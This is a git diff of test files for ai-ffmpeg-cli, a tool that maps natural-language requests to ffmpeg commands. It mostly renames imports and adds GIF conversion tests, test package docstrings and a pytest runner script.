"""Test that convert action works without format parameter."""
|
||||
intent_data = {
|
||||
"action": "convert",
|
||||
"inputs": ["/path/to/test.mp4"],
|
||||
"filters": "fps=10,scale=320:-1:flags=lanczos",
|
||||
}
|
||||
|
||||
intent = FfmpegIntent(**intent_data)
|
||||
assert intent.action == Action.convert
|
||||
assert intent.filters == ["fps=10,scale=320:-1:flags=lanczos"]
|
||||
|
||||
def test_gif_conversion_routing(self, tmp_path):
|
||||
"""Test that GIF conversion routes correctly."""
|
||||
input_path = tmp_path / "test.mp4"
|
||||
input_path.touch()
|
||||
|
||||
intent = FfmpegIntent(
|
||||
action=Action.convert,
|
||||
inputs=[input_path],
|
||||
filters="fps=10,scale=320:-1:flags=lanczos,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse",
|
||||
)
|
||||
|
||||
plan = route_intent(intent, allowed_dirs=[tmp_path])
|
||||
|
||||
assert len(plan.entries) == 1
|
||||
entry = plan.entries[0]
|
||||
assert entry.input == input_path
|
||||
|
||||
# Check that the filter chain contains the expected components
|
||||
filter_chain = " ".join(entry.args)
|
||||
assert "fps=10" in filter_chain
|
||||
assert "scale=320:-1" in filter_chain
|
||||
assert "palettegen" in filter_chain
|
||||
assert "paletteuse" in filter_chain
|
||||
|
||||
def test_gif_conversion_with_output_directory(self, tmp_path):
|
||||
"""Test GIF conversion with output directory."""
|
||||
input_path = tmp_path / "test.mp4"
|
||||
input_path.touch()
|
||||
output_dir = tmp_path / "output"
|
||||
output_dir.mkdir()
|
||||
|
||||
intent = FfmpegIntent(
|
||||
action=Action.convert,
|
||||
inputs=[input_path],
|
||||
filters="fps=10,scale=320:-1:flags=lanczos,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse",
|
||||
)
|
||||
|
||||
plan = route_intent(intent, allowed_dirs=[tmp_path], output_dir=output_dir)
|
||||
|
||||
assert len(plan.entries) == 1
|
||||
entry = plan.entries[0]
|
||||
assert entry.input == input_path
|
||||
assert entry.output.parent == output_dir
|
||||
assert entry.output.suffix == ".mp4" # Default extension for convert action
|
||||
|
||||
def test_gif_conversion_example_from_prompt(self):
|
||||
"""Test the exact example from the updated system prompt."""
|
||||
intent_data = {
|
||||
"action": "convert",
|
||||
"inputs": ["/path/to/test.mp4"],
|
||||
"filters": "fps=10,scale=320:-1:flags=lanczos,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse",
|
||||
}
|
||||
|
||||
intent = FfmpegIntent(**intent_data)
|
||||
|
||||
assert intent.action == Action.convert
|
||||
assert "fps=10" in intent.filters[0]
|
||||
assert "scale=320:-1" in intent.filters[0]
|
||||
assert "palettegen" in intent.filters[0]
|
||||
assert "paletteuse" in intent.filters[0]
|
||||
@@ -1,8 +1,8 @@
|
||||
from pathlib import Path
|
||||
|
||||
from ai_ffmpeg_cli.intent_models import Action
|
||||
from ai_ffmpeg_cli.intent_models import FfmpegIntent
|
||||
from ai_ffmpeg_cli.intent_router import route_intent
|
||||
from ai_ffmpeg_cli.nl_schema import Action
|
||||
from ai_ffmpeg_cli.nl_schema import FfmpegIntent
|
||||
|
||||
|
||||
def test_route_extract_audio_defaults_output_mp3():
|
||||
@@ -1,9 +1,9 @@
|
||||
import json
|
||||
|
||||
from ai_ffmpeg_cli.intent_models import Action
|
||||
from ai_ffmpeg_cli.intent_models import FfmpegIntent
|
||||
from ai_ffmpeg_cli.llm_client import LLMClient
|
||||
from ai_ffmpeg_cli.llm_client import LLMProvider
|
||||
from ai_ffmpeg_cli.nl_schema import Action
|
||||
from ai_ffmpeg_cli.nl_schema import FfmpegIntent
|
||||
|
||||
|
||||
class DummyProvider(LLMProvider):
|
||||
5
tests/performance/__init__.py
Normal file
5
tests/performance/__init__.py
Normal file
@@ -0,0 +1,5 @@
|
||||
"""Performance tests for ai-ffmpeg-cli.
|
||||
|
||||
This package contains performance tests that measure speed, memory usage, and scalability.
|
||||
Performance tests focus on ensuring the application meets performance requirements.
|
||||
"""
|
||||
@@ -5,9 +5,9 @@ import argparse
|
||||
import concurrent.futures
|
||||
import time
|
||||
|
||||
from ai_ffmpeg_cli.intent_models_extended import Action
|
||||
from ai_ffmpeg_cli.intent_models_extended import FfmpegIntent
|
||||
from ai_ffmpeg_cli.intent_router import route_intent
|
||||
from ai_ffmpeg_cli.intent_schema import Action
|
||||
from ai_ffmpeg_cli.intent_schema import FfmpegIntent
|
||||
|
||||
|
||||
def simulate_user_operation(user_id: int, operation_type: str = "convert"):
|
||||
@@ -17,9 +17,9 @@ import time
|
||||
|
||||
import psutil
|
||||
|
||||
from ai_ffmpeg_cli.intent_models_extended import Action
|
||||
from ai_ffmpeg_cli.intent_models_extended import FfmpegIntent
|
||||
from ai_ffmpeg_cli.intent_router import route_intent
|
||||
from ai_ffmpeg_cli.intent_schema import Action
|
||||
from ai_ffmpeg_cli.intent_schema import FfmpegIntent
|
||||
|
||||
|
||||
def monitor_memory_usage():
|
||||
126
tests/run_tests.py
Executable file
126
tests/run_tests.py
Executable file
@@ -0,0 +1,126 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Test runner script for ai-ffmpeg-cli.
|
||||
|
||||
This script provides convenient commands to run different test categories
|
||||
with various options and configurations.
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import subprocess
|
||||
import sys
|
||||
from pathlib import Path
|
||||
|
||||
|
||||
def run_command(cmd, description):
|
||||
"""Run a command and handle errors."""
|
||||
print(f"\n{'='*60}")
|
||||
print(f"Running: {description}")
|
||||
print(f"Command: {' '.join(cmd)}")
|
||||
print(f"{'='*60}\n")
|
||||
|
||||
try:
|
||||
result = subprocess.run(cmd, check=True, capture_output=False)
|
||||
print(f"\n✅ {description} completed successfully!")
|
||||
return True
|
||||
except subprocess.CalledProcessError as e:
|
||||
print(f"\n❌ {description} failed with exit code {e.returncode}")
|
||||
return False
|
||||
|
||||
|
||||
def main():
|
||||
"""Main test runner function."""
|
||||
parser = argparse.ArgumentParser(
|
||||
description="Test runner for ai-ffmpeg-cli",
|
||||
formatter_class=argparse.RawDescriptionHelpFormatter,
|
||||
epilog="""
|
||||
Examples:
|
||||
python run_tests.py unit # Run unit tests only
|
||||
python run_tests.py integration --cov # Run integration tests with coverage
|
||||
python run_tests.py all --fast # Run all fast tests
|
||||
python run_tests.py security --verbose # Run security tests with verbose output
|
||||
python run_tests.py performance --slow # Run performance tests (slow)
|
||||
""",
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"category",
|
||||
choices=["unit", "integration", "e2e", "performance", "security", "all"],
|
||||
help="Test category to run",
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--cov", action="store_true", help="Run with coverage reporting"
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--html", action="store_true", help="Generate HTML coverage report"
|
||||
)
|
||||
|
||||
parser.add_argument("--verbose", "-v", action="store_true", help="Verbose output")
|
||||
|
||||
parser.add_argument("--fast", action="store_true", help="Run only fast tests")
|
||||
|
||||
parser.add_argument("--slow", action="store_true", help="Run only slow tests")
|
||||
|
||||
parser.add_argument(
|
||||
"--parallel",
|
||||
"-n",
|
||||
type=int,
|
||||
help="Run tests in parallel with specified number of workers",
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--failed-first", action="store_true", help="Run failed tests first"
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--tb",
|
||||
choices=["auto", "long", "short", "line", "no"],
|
||||
default="auto",
|
||||
help="Traceback style",
|
||||
)
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
# Build pytest command
|
||||
cmd = ["python", "-m", "pytest"]
|
||||
|
||||
# Add test path based on category
|
||||
if args.category == "all":
|
||||
cmd.append("tests/")
|
||||
else:
|
||||
cmd.append(f"tests/{args.category}/")
|
||||
|
||||
# Add coverage options
|
||||
if args.cov:
|
||||
cmd.extend(["--cov=ai_ffmpeg_cli", "--cov-report=term-missing"])
|
||||
if args.html:
|
||||
cmd.append("--cov-report=html")
|
||||
|
||||
# Add speed filters
|
||||
if args.fast:
|
||||
cmd.append("-m fast")
|
||||
elif args.slow:
|
||||
cmd.append("-m slow")
|
||||
|
||||
# Add other options
|
||||
if args.verbose:
|
||||
cmd.append("-v")
|
||||
|
||||
if args.parallel:
|
||||
cmd.extend(["-n", str(args.parallel)])
|
||||
|
||||
if args.failed_first:
|
||||
cmd.append("--ff")
|
||||
|
||||
cmd.extend(["--tb", args.tb])
|
||||
|
||||
# Run the command
|
||||
success = run_command(cmd, f"{args.category.title()} Tests")
|
||||
|
||||
if not success:
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
5
tests/security/__init__.py
Normal file
5
tests/security/__init__.py
Normal file
@@ -0,0 +1,5 @@
|
||||
"""Security tests for ai-ffmpeg-cli.
|
||||
|
||||
This package contains security tests that verify input validation, path security, and vulnerability prevention.
|
||||
Security tests focus on ensuring the application is secure against various attack vectors.
|
||||
"""
|
||||
@@ -3,10 +3,10 @@
|
||||
from pathlib import Path
|
||||
from unittest.mock import patch
|
||||
|
||||
from ai_ffmpeg_cli.file_security import ensure_parent_dir
|
||||
from ai_ffmpeg_cli.file_security import expand_globs
|
||||
from ai_ffmpeg_cli.file_security import is_safe_path
|
||||
from ai_ffmpeg_cli.file_security import most_recent_file
|
||||
from ai_ffmpeg_cli.path_security import ensure_parent_dir
|
||||
from ai_ffmpeg_cli.path_security import expand_globs
|
||||
from ai_ffmpeg_cli.path_security import is_safe_path
|
||||
from ai_ffmpeg_cli.path_security import most_recent_file
|
||||
|
||||
|
||||
class TestExpandGlobs:
|
||||
@@ -19,7 +19,7 @@ class TestExpandGlobs:
|
||||
(tmp_path / "file2.txt").touch()
|
||||
(tmp_path / "other.log").touch()
|
||||
|
||||
with patch("ai_ffmpeg_cli.file_security.glob.glob") as mock_glob:
|
||||
with patch("ai_ffmpeg_cli.path_security.glob.glob") as mock_glob:
|
||||
mock_glob.return_value = [
|
||||
str(tmp_path / "file1.txt"),
|
||||
str(tmp_path / "file2.txt"),
|
||||
@@ -34,7 +34,7 @@ class TestExpandGlobs:
|
||||
|
||||
def test_expand_multiple_patterns(self, tmp_path):
|
||||
"""Test expanding multiple glob patterns."""
|
||||
with patch("ai_ffmpeg_cli.file_security.glob.glob") as mock_glob:
|
||||
with patch("ai_ffmpeg_cli.path_security.glob.glob") as mock_glob:
|
||||
# Mock different returns for different patterns
|
||||
def mock_glob_side_effect(pattern, recursive=True):
|
||||
if pattern == "*.txt":
|
||||
@@ -54,7 +54,7 @@ class TestExpandGlobs:
|
||||
|
||||
def test_expand_no_matches(self):
|
||||
"""Test expanding pattern with no matches."""
|
||||
with patch("ai_ffmpeg_cli.file_security.glob.glob", return_value=[]):
|
||||
with patch("ai_ffmpeg_cli.path_security.glob.glob", return_value=[]):
|
||||
result = expand_globs(["*.nonexistent"])
|
||||
|
||||
assert result == []
|
||||
@@ -66,7 +66,7 @@ class TestExpandGlobs:
|
||||
|
||||
def test_expand_recursive_pattern(self, tmp_path):
|
||||
"""Test expanding recursive glob patterns."""
|
||||
with patch("ai_ffmpeg_cli.file_security.glob.glob") as mock_glob:
|
||||
with patch("ai_ffmpeg_cli.path_security.glob.glob") as mock_glob:
|
||||
mock_glob.return_value = [
|
||||
str(tmp_path / "dir1" / "file.txt"),
|
||||
str(tmp_path / "dir2" / "file.txt"),
|
||||
@@ -81,7 +81,7 @@ class TestExpandGlobs:
|
||||
"""Test that duplicate paths are removed."""
|
||||
duplicate_path = str(tmp_path / "duplicate.txt")
|
||||
|
||||
with patch("ai_ffmpeg_cli.file_security.glob.glob") as mock_glob:
|
||||
with patch("ai_ffmpeg_cli.path_security.glob.glob") as mock_glob:
|
||||
# Return same file from different patterns
|
||||
def mock_glob_side_effect(pattern, recursive=True):
|
||||
return [duplicate_path]
|
||||
@@ -96,7 +96,7 @@ class TestExpandGlobs:
|
||||
|
||||
def test_expand_absolute_paths(self):
|
||||
"""Test that returned paths are absolute."""
|
||||
with patch("ai_ffmpeg_cli.file_security.glob.glob") as mock_glob:
|
||||
with patch("ai_ffmpeg_cli.path_security.glob.glob") as mock_glob:
|
||||
mock_glob.return_value = ["relative/path.txt"]
|
||||
|
||||
result = expand_globs(["*.txt"])
|
||||
@@ -2,16 +2,16 @@
|
||||
|
||||
from pathlib import Path
|
||||
|
||||
from ai_ffmpeg_cli.io_utils import _is_safe_glob_pattern
|
||||
from ai_ffmpeg_cli.io_utils import expand_globs
|
||||
from ai_ffmpeg_cli.io_utils import is_safe_path
|
||||
from ai_ffmpeg_cli.io_utils import sanitize_filename
|
||||
from ai_ffmpeg_cli.io_utils import sanitize_user_input
|
||||
from ai_ffmpeg_cli.io_utils import validate_ffmpeg_command
|
||||
from ai_ffmpeg_cli.security import SecretStr
|
||||
from ai_ffmpeg_cli.security import mask_api_key
|
||||
from ai_ffmpeg_cli.security import sanitize_error_message
|
||||
from ai_ffmpeg_cli.security import validate_api_key_format
|
||||
from ai_ffmpeg_cli.credential_security import SecretStr
|
||||
from ai_ffmpeg_cli.credential_security import mask_api_key
|
||||
from ai_ffmpeg_cli.credential_security import sanitize_error_message
|
||||
from ai_ffmpeg_cli.credential_security import validate_api_key_format
|
||||
from ai_ffmpeg_cli.file_operations import _is_safe_glob_pattern
|
||||
from ai_ffmpeg_cli.file_operations import expand_globs
|
||||
from ai_ffmpeg_cli.file_operations import is_safe_path
|
||||
from ai_ffmpeg_cli.file_operations import sanitize_filename
|
||||
from ai_ffmpeg_cli.file_operations import sanitize_user_input
|
||||
from ai_ffmpeg_cli.file_operations import validate_ffmpeg_command
|
||||
|
||||
|
||||
class TestPathSecurity:
|
||||
5
tests/unit/__init__.py
Normal file
5
tests/unit/__init__.py
Normal file
@@ -0,0 +1,5 @@
|
||||
"""Unit tests for ai-ffmpeg-cli.
|
||||
|
||||
This package contains unit tests for individual components and functions.
|
||||
Unit tests focus on testing isolated functionality without external dependencies.
|
||||
"""
|
||||
@@ -1,8 +1,8 @@
|
||||
from pathlib import Path
|
||||
|
||||
from ai_ffmpeg_cli.command_builder import build_commands
|
||||
from ai_ffmpeg_cli.nl_schema import CommandEntry
|
||||
from ai_ffmpeg_cli.nl_schema import CommandPlan
|
||||
from ai_ffmpeg_cli.intent_models import CommandEntry
|
||||
from ai_ffmpeg_cli.intent_models import CommandPlan
|
||||
|
||||
|
||||
def test_convert_defaults_to_h264_aac():
|
||||
@@ -8,7 +8,7 @@ from pydantic import ValidationError
|
||||
|
||||
from ai_ffmpeg_cli.config import AppConfig
|
||||
from ai_ffmpeg_cli.config import load_config
|
||||
from ai_ffmpeg_cli.errors import ConfigError
|
||||
from ai_ffmpeg_cli.custom_exceptions import ConfigError
|
||||
|
||||
|
||||
class TestAppConfig:
|
||||
@@ -28,14 +28,14 @@ class TestAppConfig:
|
||||
"""Test configuration with explicit values."""
|
||||
config = AppConfig(
|
||||
openai_api_key="test-key",
|
||||
model="gpt-4o-mini",
|
||||
model="gpt-5",
|
||||
dry_run=True,
|
||||
confirm_default=False,
|
||||
timeout_seconds=120,
|
||||
)
|
||||
|
||||
assert config.openai_api_key == "test-key"
|
||||
assert config.model == "gpt-4o-mini"
|
||||
assert config.model == "gpt-5"
|
||||
assert config.dry_run is True
|
||||
assert config.confirm_default is False
|
||||
assert config.timeout_seconds == 120
|
||||
@@ -6,14 +6,14 @@ from pathlib import Path
|
||||
from unittest.mock import Mock
|
||||
from unittest.mock import patch
|
||||
|
||||
from ai_ffmpeg_cli.context_scanner import _ffprobe_duration
|
||||
from ai_ffmpeg_cli.context_scanner import scan
|
||||
from ai_ffmpeg_cli.context_scanner_basic import _ffprobe_duration
|
||||
from ai_ffmpeg_cli.context_scanner_basic import scan
|
||||
|
||||
|
||||
class TestFfprobeDuration:
|
||||
"""Test ffprobe duration extraction."""
|
||||
|
||||
@patch("ai_ffmpeg_cli.context_scanner.shutil.which")
|
||||
@patch("ai_ffmpeg_cli.context_scanner_basic.shutil.which")
|
||||
def test_ffprobe_not_available(self, mock_which):
|
||||
"""Test when ffprobe is not available."""
|
||||
mock_which.return_value = None
|
||||
@@ -23,8 +23,8 @@ class TestFfprobeDuration:
|
||||
assert result is None
|
||||
mock_which.assert_called_once_with("ffprobe")
|
||||
|
||||
@patch("ai_ffmpeg_cli.context_scanner.shutil.which")
|
||||
@patch("ai_ffmpeg_cli.context_scanner.subprocess.run")
|
||||
@patch("ai_ffmpeg_cli.context_scanner_basic.shutil.which")
|
||||
@patch("ai_ffmpeg_cli.context_scanner_basic.subprocess.run")
|
||||
def test_ffprobe_success(self, mock_run, mock_which):
|
||||
"""Test successful ffprobe duration extraction."""
|
||||
mock_which.return_value = "/usr/bin/ffprobe"
|
||||
@@ -53,8 +53,8 @@ class TestFfprobeDuration:
|
||||
text=True,
|
||||
)
|
||||
|
||||
@patch("ai_ffmpeg_cli.context_scanner.shutil.which")
|
||||
@patch("ai_ffmpeg_cli.context_scanner.subprocess.run")
|
||||
@patch("ai_ffmpeg_cli.context_scanner_basic.shutil.which")
|
||||
@patch("ai_ffmpeg_cli.context_scanner_basic.subprocess.run")
|
||||
def test_ffprobe_no_duration(self, mock_run, mock_which):
|
||||
"""Test ffprobe response without duration."""
|
||||
mock_which.return_value = "/usr/bin/ffprobe"
|
||||
@@ -68,8 +68,8 @@ class TestFfprobeDuration:
|
||||
|
||||
assert result is None
|
||||
|
||||
@patch("ai_ffmpeg_cli.context_scanner.shutil.which")
|
||||
@patch("ai_ffmpeg_cli.context_scanner.subprocess.run")
|
||||
@patch("ai_ffmpeg_cli.context_scanner_basic.shutil.which")
|
||||
@patch("ai_ffmpeg_cli.context_scanner_basic.subprocess.run")
|
||||
def test_ffprobe_invalid_duration(self, mock_run, mock_which):
|
||||
"""Test ffprobe response with invalid duration."""
|
||||
mock_which.return_value = "/usr/bin/ffprobe"
|
||||
@@ -83,8 +83,8 @@ class TestFfprobeDuration:
|
||||
|
||||
assert result is None
|
||||
|
||||
@patch("ai_ffmpeg_cli.context_scanner.shutil.which")
|
||||
@patch("ai_ffmpeg_cli.context_scanner.subprocess.run")
|
||||
@patch("ai_ffmpeg_cli.context_scanner_basic.shutil.which")
|
||||
@patch("ai_ffmpeg_cli.context_scanner_basic.subprocess.run")
|
||||
def test_ffprobe_subprocess_error(self, mock_run, mock_which):
|
||||
"""Test ffprobe subprocess error."""
|
||||
mock_which.return_value = "/usr/bin/ffprobe"
|
||||
@@ -94,8 +94,8 @@ class TestFfprobeDuration:
|
||||
|
||||
assert result is None
|
||||
|
||||
@patch("ai_ffmpeg_cli.context_scanner.shutil.which")
|
||||
@patch("ai_ffmpeg_cli.context_scanner.subprocess.run")
|
||||
@patch("ai_ffmpeg_cli.context_scanner_basic.shutil.which")
|
||||
@patch("ai_ffmpeg_cli.context_scanner_basic.subprocess.run")
|
||||
def test_ffprobe_json_decode_error(self, mock_run, mock_which):
|
||||
"""Test ffprobe with invalid JSON response."""
|
||||
mock_which.return_value = "/usr/bin/ffprobe"
|
||||
@@ -122,8 +122,11 @@ class TestScan:
|
||||
(tmp_path / "text.txt").write_bytes(b"text file")
|
||||
|
||||
with (
|
||||
patch("ai_ffmpeg_cli.context_scanner.Path.cwd", return_value=tmp_path),
|
||||
patch("ai_ffmpeg_cli.context_scanner._ffprobe_duration", return_value=120.0),
|
||||
patch("ai_ffmpeg_cli.context_scanner_basic.Path.cwd", return_value=tmp_path),
|
||||
patch(
|
||||
"ai_ffmpeg_cli.context_scanner_basic._ffprobe_duration",
|
||||
return_value=120.0,
|
||||
),
|
||||
):
|
||||
result = scan()
|
||||
|
||||
@@ -148,7 +151,7 @@ class TestScan:
|
||||
(tmp_path / "movie.mov").write_bytes(b"fake movie")
|
||||
(tmp_path / "song.wav").write_bytes(b"fake song")
|
||||
|
||||
with patch("ai_ffmpeg_cli.context_scanner._ffprobe_duration", return_value=None):
|
||||
with patch("ai_ffmpeg_cli.context_scanner_basic._ffprobe_duration", return_value=None):
|
||||
result = scan(cwd=tmp_path)
|
||||
|
||||
assert result["cwd"] == str(tmp_path)
|
||||
@@ -159,7 +162,7 @@ class TestScan:
|
||||
assert "song.wav" in audio_names
|
||||
assert result["images"] == []
|
||||
|
||||
@patch("ai_ffmpeg_cli.context_scanner.most_recent_file")
|
||||
@patch("ai_ffmpeg_cli.context_scanner_basic.most_recent_file")
|
||||
def test_scan_with_most_recent_video(self, mock_most_recent, tmp_path):
|
||||
"""Test scanning with most recent video detection."""
|
||||
# Create test files
|
||||
@@ -168,13 +171,13 @@ class TestScan:
|
||||
|
||||
mock_most_recent.return_value = tmp_path / "new.mp4"
|
||||
|
||||
with patch("ai_ffmpeg_cli.context_scanner._ffprobe_duration", return_value=60.0):
|
||||
with patch("ai_ffmpeg_cli.context_scanner_basic._ffprobe_duration", return_value=60.0):
|
||||
result = scan(cwd=tmp_path)
|
||||
|
||||
assert result["most_recent_video"] == str(tmp_path / "new.mp4")
|
||||
mock_most_recent.assert_called_once()
|
||||
|
||||
@patch("ai_ffmpeg_cli.context_scanner.most_recent_file")
|
||||
@patch("ai_ffmpeg_cli.context_scanner_basic.most_recent_file")
|
||||
def test_scan_no_most_recent_video(self, mock_most_recent, tmp_path):
|
||||
"""Test scanning when no most recent video is found."""
|
||||
mock_most_recent.return_value = None
|
||||
@@ -201,7 +204,7 @@ class TestScan:
|
||||
(tmp_path / "audio.MP3").write_bytes(b"fake audio")
|
||||
(tmp_path / "image.PNG").write_bytes(b"fake image")
|
||||
|
||||
with patch("ai_ffmpeg_cli.context_scanner._ffprobe_duration", return_value=None):
|
||||
with patch("ai_ffmpeg_cli.context_scanner_basic._ffprobe_duration", return_value=None):
|
||||
result = scan(cwd=tmp_path)
|
||||
|
||||
video_names = [Path(v).name for v in result["videos"]]
|
||||
@@ -229,7 +232,7 @@ class TestScan:
|
||||
for filename in image_files:
|
||||
(tmp_path / filename).write_bytes(b"fake image")
|
||||
|
||||
with patch("ai_ffmpeg_cli.context_scanner._ffprobe_duration", return_value=None):
|
||||
with patch("ai_ffmpeg_cli.context_scanner_basic._ffprobe_duration", return_value=None):
|
||||
result = scan(cwd=tmp_path)
|
||||
|
||||
# Extract filenames from full paths
|
||||
@@ -257,7 +260,7 @@ class TestScan:
|
||||
# Create file in main directory
|
||||
(tmp_path / "main.mp4").write_bytes(b"fake video")
|
||||
|
||||
with patch("ai_ffmpeg_cli.context_scanner._ffprobe_duration", return_value=None):
|
||||
with patch("ai_ffmpeg_cli.context_scanner_basic._ffprobe_duration", return_value=None):
|
||||
result = scan(cwd=tmp_path)
|
||||
|
||||
# Extract filenames from full paths
|
||||
@@ -3,10 +3,10 @@
|
||||
from pathlib import Path
|
||||
from unittest.mock import patch
|
||||
|
||||
from ai_ffmpeg_cli.io_utils import ensure_parent_dir
|
||||
from ai_ffmpeg_cli.io_utils import expand_globs
|
||||
from ai_ffmpeg_cli.io_utils import is_safe_path
|
||||
from ai_ffmpeg_cli.io_utils import most_recent_file
|
||||
from ai_ffmpeg_cli.file_operations import ensure_parent_dir
|
||||
from ai_ffmpeg_cli.file_operations import expand_globs
|
||||
from ai_ffmpeg_cli.file_operations import is_safe_path
|
||||
from ai_ffmpeg_cli.file_operations import most_recent_file
|
||||
|
||||
|
||||
class TestExpandGlobs:
|
||||
@@ -19,7 +19,7 @@ class TestExpandGlobs:
|
||||
(tmp_path / "file2.txt").touch()
|
||||
(tmp_path / "other.log").touch()
|
||||
|
||||
with patch("ai_ffmpeg_cli.io_utils.glob.glob") as mock_glob:
|
||||
with patch("ai_ffmpeg_cli.file_operations.glob.glob") as mock_glob:
|
||||
mock_glob.return_value = [
|
||||
str(tmp_path / "file1.txt"),
|
||||
str(tmp_path / "file2.txt"),
|
||||
@@ -34,7 +34,7 @@ class TestExpandGlobs:
|
||||
|
||||
def test_expand_multiple_patterns(self, tmp_path):
|
||||
"""Test expanding multiple glob patterns."""
|
||||
with patch("ai_ffmpeg_cli.io_utils.glob.glob") as mock_glob:
|
||||
with patch("ai_ffmpeg_cli.file_operations.glob.glob") as mock_glob:
|
||||
# Mock different returns for different patterns
|
||||
def mock_glob_side_effect(pattern, recursive=True):
|
||||
if pattern == "*.txt":
|
||||
@@ -54,7 +54,7 @@ class TestExpandGlobs:
|
||||
|
||||
def test_expand_no_matches(self):
|
||||
"""Test expanding pattern with no matches."""
|
||||
with patch("ai_ffmpeg_cli.io_utils.glob.glob", return_value=[]):
|
||||
with patch("ai_ffmpeg_cli.file_operations.glob.glob", return_value=[]):
|
||||
result = expand_globs(["*.nonexistent"])
|
||||
|
||||
assert result == []
|
||||
@@ -66,7 +66,7 @@ class TestExpandGlobs:
|
||||
|
||||
def test_expand_recursive_pattern(self, tmp_path):
|
||||
"""Test expanding recursive glob patterns."""
|
||||
with patch("ai_ffmpeg_cli.io_utils.glob.glob") as mock_glob:
|
||||
with patch("ai_ffmpeg_cli.file_operations.glob.glob") as mock_glob:
|
||||
mock_glob.return_value = [
|
||||
str(tmp_path / "dir1" / "file.txt"),
|
||||
str(tmp_path / "dir2" / "file.txt"),
|
||||
@@ -81,7 +81,7 @@ class TestExpandGlobs:
|
||||
"""Test that duplicate paths are removed."""
|
||||
duplicate_path = str(tmp_path / "duplicate.txt")
|
||||
|
||||
with patch("ai_ffmpeg_cli.io_utils.glob.glob") as mock_glob:
|
||||
with patch("ai_ffmpeg_cli.file_operations.glob.glob") as mock_glob:
|
||||
# Return same file from different patterns
|
||||
def mock_glob_side_effect(pattern, recursive=True):
|
||||
return [duplicate_path]
|
||||
@@ -96,7 +96,7 @@ class TestExpandGlobs:
|
||||
|
||||
def test_expand_absolute_paths(self):
|
||||
"""Test that returned paths are absolute."""
|
||||
with patch("ai_ffmpeg_cli.io_utils.glob.glob") as mock_glob:
|
||||
with patch("ai_ffmpeg_cli.file_operations.glob.glob") as mock_glob:
|
||||
mock_glob.return_value = ["relative/path.txt"]
|
||||
|
||||
result = expand_globs(["*.txt"])
|
||||
@@ -5,11 +5,11 @@ from pathlib import Path
|
||||
import pytest
|
||||
from pydantic import ValidationError
|
||||
|
||||
from ai_ffmpeg_cli.nl_schema import Action
|
||||
from ai_ffmpeg_cli.nl_schema import CommandEntry
|
||||
from ai_ffmpeg_cli.nl_schema import CommandPlan
|
||||
from ai_ffmpeg_cli.nl_schema import FfmpegIntent
|
||||
from ai_ffmpeg_cli.nl_schema import _seconds_to_timestamp
|
||||
from ai_ffmpeg_cli.intent_models import Action
|
||||
from ai_ffmpeg_cli.intent_models import CommandEntry
|
||||
from ai_ffmpeg_cli.intent_models import CommandPlan
|
||||
from ai_ffmpeg_cli.intent_models import FfmpegIntent
|
||||
from ai_ffmpeg_cli.intent_models import _seconds_to_timestamp
|
||||
|
||||
|
||||
class TestSecondsToTimestamp:
|
||||
@@ -67,8 +67,10 @@ class TestAction:
|
||||
"segment",
|
||||
"thumbnail",
|
||||
"frames",
|
||||
"extract_frames",
|
||||
"compress",
|
||||
"overlay",
|
||||
"format_convert",
|
||||
}
|
||||
actual_actions = {action.value for action in Action}
|
||||
assert actual_actions == expected_actions
|
||||
@@ -259,7 +261,10 @@ class TestFfmpegIntent:
|
||||
|
||||
def test_convert_validation_no_inputs(self):
|
||||
"""Test convert validation fails without inputs."""
|
||||
with pytest.raises(ValidationError, match="convert/compress requires at least one input"):
|
||||
with pytest.raises(
|
||||
ValidationError,
|
||||
match="convert/compress/format_convert requires at least one input",
|
||||
):
|
||||
FfmpegIntent(action=Action.convert, inputs=[])
|
||||
|
||||
def test_compress_validation_success(self):
|
||||
@@ -271,7 +276,10 @@ class TestFfmpegIntent:
|
||||
|
||||
def test_compress_validation_no_inputs(self):
|
||||
"""Test compress validation fails without inputs."""
|
||||
with pytest.raises(ValidationError, match="convert/compress requires at least one input"):
|
||||
with pytest.raises(
|
||||
ValidationError,
|
||||
match="convert/compress/format_convert requires at least one input",
|
||||
):
|
||||
FfmpegIntent(action=Action.compress, inputs=[])
|
||||
|
||||
def test_extract_audio_validation_success(self):
|
||||
@@ -5,11 +5,11 @@ from pathlib import Path
|
||||
import pytest
|
||||
from pydantic import ValidationError
|
||||
|
||||
from ai_ffmpeg_cli.intent_schema import Action
|
||||
from ai_ffmpeg_cli.intent_schema import CommandEntry
|
||||
from ai_ffmpeg_cli.intent_schema import CommandPlan
|
||||
from ai_ffmpeg_cli.intent_schema import FfmpegIntent
|
||||
from ai_ffmpeg_cli.intent_schema import _seconds_to_timestamp
|
||||
from ai_ffmpeg_cli.intent_models_extended import Action
|
||||
from ai_ffmpeg_cli.intent_models_extended import CommandEntry
|
||||
from ai_ffmpeg_cli.intent_models_extended import CommandPlan
|
||||
from ai_ffmpeg_cli.intent_models_extended import FfmpegIntent
|
||||
from ai_ffmpeg_cli.intent_models_extended import _seconds_to_timestamp
|
||||
|
||||
|
||||
class TestSecondsToTimestamp:
|
||||
@@ -209,9 +209,7 @@ class TestFfmpegIntent:
|
||||
|
||||
def test_trim_validation_with_duration(self):
|
||||
"""Test trim validation with duration."""
|
||||
intent = FfmpegIntent(
|
||||
action=Action.trim, inputs=[Path("input.mp4")], duration=30.0
|
||||
)
|
||||
intent = FfmpegIntent(action=Action.trim, inputs=[Path("input.mp4")], duration=30.0)
|
||||
|
||||
assert intent.duration == 30.0
|
||||
|
||||
@@ -271,9 +269,7 @@ class TestFfmpegIntent:
|
||||
|
||||
def test_compress_validation_success(self):
|
||||
"""Test successful compress validation."""
|
||||
intent = FfmpegIntent(
|
||||
action=Action.compress, inputs=[Path("input.mp4")], crf=28
|
||||
)
|
||||
intent = FfmpegIntent(action=Action.compress, inputs=[Path("input.mp4")], crf=28)
|
||||
|
||||
assert intent.action == Action.compress
|
||||
assert intent.crf == 28
|
||||
@@ -294,9 +290,7 @@ class TestFfmpegIntent:
|
